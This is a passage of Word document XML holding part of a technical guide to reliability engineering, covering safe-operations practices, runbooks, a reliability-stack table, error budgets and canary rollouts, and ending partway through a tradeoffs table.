    <w:p w14:paraId="2FF58AA0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 Designing for Human Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3F4C3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Make it hard to do the wrong thing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361D878" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immutable infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Never modify production servers. Replace them. Eliminates "oops I ran that command on the wrong server."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA68B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GitOps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> All changes go through pull requests with review. No direct production access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FBDEB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Safe defaults:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Tools should require explicit opt-in for dangerous operations (--force, --i-really-mean-it flags).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335DC61" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dry-run modes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every destructive operation should have a preview mode showing what WOULD happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34544051" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Make it easy to recover from mistakes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F343D6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rapid rollback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every deployment can be reverted in seconds (blue-green, feature flags).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224EB1E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Soft deletes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Never hard-delete data immediately. Mark as deleted. Purge after 30 days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CAF0C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progressive rollouts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Changes reach 1% of users first. If bad → rollback affects only 1%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B42E55" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Breakglass procedures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Well-documented emergency procedures for undoing any type of change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56625DF3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reduce the frequency of risky operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB22D9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automate routine operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Manual steps = human error opportunity. Automate everything that's done more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2434A411" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reduce deployment complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Simple deployments happen frequently. Complex deployments happen rarely. Frequent = practiced = safer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286F3B9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.3 Runbooks and Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E40C7FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runbooks as reliability tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76450F32" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Pre-written procedures for known failure modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264ECA5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="528"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"If database replication lag exceeds 30 seconds: check these 5 things in this order."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D75CF9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="528"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"If payment service returns 5xx: switch to fallback payment provider using this procedure."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55166691" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why runbooks improve reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769A5A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reduce MTTR (no debugging from scratch at 3 AM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B052E32" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reduce human error during incidents (following a checklist vs. improvising under stress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9F9EC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Encode institutional knowledge (the person who knows the fix might not be on-call).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85B0B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="3E45C764">
          <v:rect id="_x0000_i2949" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D86DF7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Reliability at Scale — Putting It All Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF5347" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.1 The Reliability Stack (Bottom to Top)</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72"/>
        <w:gridCol w:w="6606"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="03BB0CF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2AAD9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Layer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539D01" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reliability Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="32C8B3C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EC9B19" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Hardware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06D93C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>ECC RAM, RAID/erasure coding, redundant power, dual NICs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="42A2B60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A4CE99" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Storage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96BB78" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>WAL, checksums, replication, backups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6F12A2E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2EC0D3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Network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A85005" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>TCP retransmission, redundant paths, timeouts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="22B999A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00AF58" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Data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538F9E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Replication (sync/async/quorum), consensus protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6D7A8BC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47B1A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Application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76DFF4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Transactions, idempotency, retry logic, circuit breakers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="53EEC8A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50251C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Workflow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AC6D6D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Saga pattern, outbox pattern, state machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="04A3966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94E1FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Operations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ADDA7D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Chaos engineering, progressive rollouts, runbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="346DDBA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CD883F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Human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F08D69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Code review, immutable infra, automated guardrails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7590355C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.2 How Google/Amazon/Netflix Think About Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C0442" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The error budget model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C18F1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Define an SLO: "99.95% of requests will be correct AND within 200ms."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F59B88" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Error budget = 0.05% of requests can fail per month.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CA345" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Track burn rate: if you're consuming error budget faster than expected, freeze risky changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F07971" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>If error budget is healthy → ship faster (accept more risk for velocity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6FA2B0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blast radius reduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC13473" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Never change everything at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05D2A7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Canary → 1% → 10% → 50% → 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F3752" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If reliability degrades at any stage → automatic rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA18C8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cell-based architecture: split users into independent "cells." A failure in Cell A doesn't affect Cell B. (AWS calls these "shuffle sharding.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985A23F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense in depth for data reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE32D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Amazon S3's 11 nines of durability (99.999999999%):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E02CEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Data written to multiple devices in a facility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28785B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replicated across 3+ Availability Zones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E295B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Checksums verified on every read and write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A549ED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Automatic corruption repair (read from good copy, rewrite to fix bad one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B11AF9C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Background integrity verification (continuously scanning all data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208ADB73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Versioning (previous versions preserved, immune to overwrites/deletes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A119449" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="15FF1DA6">
          <v:rect id="_x0000_i2950" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F726F43" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21. The Fundamental Tradeoffs of Reliability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162"/>
        <w:gridCol w:w="5193"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="7FBFDF3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2346C4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>More Reliability Requires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5E967C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Which Costs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="50D62F3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E469AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Redundancy (more copies)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B6DA02" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Storage, compute, money</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="0E844E8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DDCBBC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Synchronous replication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DDD014" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Latency (must wait for replicas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="634E292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C49065" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
